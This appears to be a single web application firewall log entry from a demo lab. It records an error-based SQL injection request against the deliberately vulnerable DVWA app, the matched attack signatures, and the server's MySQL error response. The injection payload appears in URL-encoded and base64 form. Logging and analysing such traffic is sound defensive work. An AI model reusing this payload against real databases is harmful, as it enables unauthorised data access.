<131>Jun 6 19:16:25 wafhostname.localhost.com ASM:"2023-06-06 19:16:25"~,~"153.31.42.75"~,~"N/A"~,~"US"~,~"Unknown"~,~"wafhostname.localhost.com"~,~"/Common/DEMO_WAFLogic-777"~,~"200"~,~"alerted"~,~"GET"~,~"/dvwa/vulnerabilities/sqli/"~,~"id=1%27%20OR%20GTID_SUBSET%28CONCAT%280x71767a6b71%2C%28SELECT%20%28ELT%289014%3D9014%2C1%29%29%29%2C0x71706b6b71%29%2C9014%29--%20Qchb&Submit=Submit"~,~"N/A"~,~"N/A"~,~"not_received"~,~"HTTP protocol compliance failed,Illegal meta character in value,Attack signature detected"~,~"HTTP protocol compliance failed:Header name with no header value"~,~"5"~,~"Error"~,~"Vulnerability Scan,Abuse of Functionality,SQL-Injection,HTTP Parser Attack"~,~"N/A"~,~"200002430,200002419,200002951,200002937,200015125"~,~"SQL-INJ expressions like ""or 1 --"",SQL-INJ expressions like ""' or 1 --"",SQL-INJ CONCAT(0x) (Parameter)..."~,~""~,~""~,~"N/A"~,~"N/A"~,~"0-04c77f3efffbffffb-fffffef9f00000404c73f10d2c207ffb-fdbc0008300000000-0

42VIOL_ATTACK_SIGNATURErequest2000151256R0VUIC9EVldBL3Z1bG5lcmFiaWxpdGllcy9zcWxpLz9pZD0xJTI3JTIwT1IlMjBHVElEX1NVQlNFVCUyOENP32742VIOL_ATTACK_SIGNATUREparameterglobalaWQ=MScgT1IgR1RJRF9TVUJTRVQoQ09OQ0FUKDB4NzE3NjdhNmI3MSwoU0VMRUNUIChFTFQoOTAxND05MDE0LDEpKSksMHg3MTcwNmI2YjcxKSw5MDE0KS0tIFFjaGI=*002000024306IE9SIEdUSURfU1VCU0VUKENPTkNBVCgweDcxNzY3YTZiNzEsKFNFTEVDVCAoRUxUKDkwMTQ9OTAxNCwxKSkp1622000024196MScgT1IgR1RJRF9TVUJTRVQoQ09OQ0FUKDB4NzE3NjdhNmI3MSwoU0VMRUNUIChFTFQoOTAxND05MDE0LDEp1622000029516aWQ9MScgT1IgR1RJRF9TVUJTRVQoQ09OQ0FUKDB4NzE3NjdhNmI3MSwoU0VMRUNUIChFTFQoOTAxND05MDE021202000029376Q0FUKDB4NzE3NjdhNmI3MSwoU0VMRUNUIChFTFQoOTAxND05MDE0LDEpKSksMHg3MTcwNmI2YjcxKSw5MDE026132000024306IE9SIEdUSURfU1VCU0VUKENPTkNBVCgweDcxNzY3YTZiNzEsKFNFTEVDVCAoRUxUKDkwMTQ9OTAxNCwxKSkp1622000029516aWQ9MSBPUiBHVElEX1NVQlNFVChDT05DQVQoMHg3MTc2N2E2YjcxLChTRUxFQ1QgKEVMVCg5MDE0PTkwMTQs20202000029376aWQ9MSBPUiBHVElEX1NVQlNFVChDT05DQVQoMHg3MTc2N2E2YjcxLChTRUxFQ1QgKEVMVCg5MDE0PTkwMTQs491314VIOL_HTTP_PROTOCOL22SGVhZGVyICdzZWMtY2gtdWEnIGhhcyBubyB2YWx1ZQ==24VIOL_PARAMETER_VALUE_METACHARglobalaWQ=MScgT1IgR1RJRF9TVUJTRVQoQ09OQ0FUKDB4NzE3NjdhNmI3MSwoU0VMRUNUIChFTFQoOTAxND05MDE0LDEpKSksMHg3MTcwNmI2YjcxKSw5MDE0KS0tIFFjaGI=*0439

"~,~"GET /DVWA/vulnerabilities/sqli/?id=1%27%20OR%20GTID_SUBSET%28CONCAT%280x71767a6b71%2C%28SELECT%20%28ELT%289014%3D9014%2C1%29%29%29%2C0x71706b6b71%29%2C9014%29--%20Qchb&Submit=Submit HTTP/1.1\r\nHost: kali-play.waflogic.com\r\nsec-ch-ua: \r\nsec-ch-ua-mobile: ?0\r\nsec-ch-ua-platform: """"\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nWAF-Life: ""Chapter 2"",""Logging"",""The WAF Guy Was Here!""\r\nReferer: http://localhost/DVWA/vulnerabilities/sqli/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: security=low; PHPSESSID=ct6el3hmh1qmeiqb4n327d78b6\r\nConnection: close\r\n\r\n"~,~"HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:16:25 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 261\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n
\nFatal error: Uncaught mysqli_sql_exception: FUNCTION dvwa.GTID_SUBSET does not exist in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php:11\nStack trace:\n#0 /var/www/html/DVWA/vulnerabilities/sqli/source/low.php(11): mysqli_query()\n#1 /var/www/html/DVWA/vulnerabilities/sqli/index.php(34): require_once('...')\n#2 {main}\n thrown in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php on line 11
\n"~,~""~,~"9216504019076316805"